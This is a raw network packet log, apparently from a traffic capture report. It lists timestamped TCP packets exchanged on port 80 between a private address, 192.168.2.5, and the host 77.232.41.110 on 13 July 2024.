                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.363518000 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.363527060 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.363529921 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.363529921 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.363543987 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.363549948 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.363559008 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.363575935 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.363581896 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.363581896 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.363591909 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.363607883 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.363619089 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.363619089 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.363646984 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.363646984 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.364005089 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.364021063 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.364036083 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.364053011 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.364063025 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.364068985 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.364083052 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.364097118 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.364097118 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.364099026 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.364111900 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.364115000 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.364124060 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.364130020 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.364132881 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.364157915 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.364173889 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.405615091 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.405677080 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.405685902 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.405721903 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.405755997 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.405764103 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.405764103 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.405812025 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.405836105 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.405847073 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.405880928 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.405914068 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.405925035 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.405925035 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.405947924 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.406001091 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.406034946 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.406044006 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.406044006 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.406069994 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.406105042 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.406140089 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.406173944 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.406173944 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.406208992 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.406234026 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.406243086 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.406275034 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.406282902 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.406282902 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.406307936 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.406341076 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.406352043 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.406352043 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.406374931 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.406407118 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.406415939 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.406415939 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.406485081 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.446717024 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.446816921 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.446875095 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.446909904 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.446943045 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.446978092 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.446986914 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447011948 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447065115 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447097063 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447133064 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447165966 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447199106 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447226048 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447226048 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447226048 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447226048 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447226048 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447227001 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447227001 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447232008 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447266102 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447294950 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447297096 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447326899 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447351933 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447361946 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447396994 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447408915 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447408915 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447431087 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447469950 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447477102 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447477102 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447509050 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447541952 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447551966 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447551966 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447576046 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447609901 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447613955 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447643995 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447645903 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447647095 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447679043 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447714090 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447731018 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447747946 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447802067 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447853088 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447885990 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447918892 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447930098 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447930098 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447952032 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.447985888 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448003054 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448018074 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448050976 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448060989 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448060989 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448082924 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448122025 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448154926 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448154926 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448170900 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448326111 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448358059 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448390007 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448411942 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448425055 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448458910 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448472977 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448472977 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448515892 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448523998 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448558092 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448590040 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448632956 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448666096 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448699951 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448714018 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448714018 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448736906 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448736906 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448756933 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448847055 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448879957 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448959112 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.448992968 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449024916 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449026108 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449054003 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449054003 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449060917 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449095011 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449131012 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449166059 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449268103 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449268103 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449268103 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449275017 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449306965 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449341059 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449373960 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449410915 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449436903 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449436903 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449444056 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449477911 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449481010 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449481010 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449526072 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449554920 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449587107 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449595928 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449595928 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449621916 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449655056 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449687958 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449711084 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449738979 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449754953 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449786901 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449811935 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449961901 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.449995995 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.450025082 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.450047016 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.450061083 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.450078964 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.450114012 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.450148106 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.450170040 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.450181961 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.450201035 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.450236082 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.484333992 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.484425068 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.484443903 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.484460115 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.484523058 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.484555006 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.484608889 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.484642982 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.484675884 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.484709024 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.484741926 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.484776020 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.484776020 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.484776974 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.484776974 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.484776974 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.484776974 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.484776974 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.484776974 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.484810114 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.484817982 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.484817982 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.484843969 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.484878063 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.484891891 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.484891891 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.485110044 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492218971 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492263079 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492321014 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492356062 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492386103 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492419958 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492454052 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492492914 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492492914 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492528915 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492564917 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492582083 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492582083 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492582083 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492597103 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492618084 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492618084 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492630005 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492645025 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492659092 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492693901 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492710114 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492743969 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492760897 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492760897 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492783070 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492816925 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492840052 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492867947 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492907047 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492913008 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492913008 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492939949 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492974043 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492988110 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.492988110 CEST5897980192.168.2.577.232.41.110
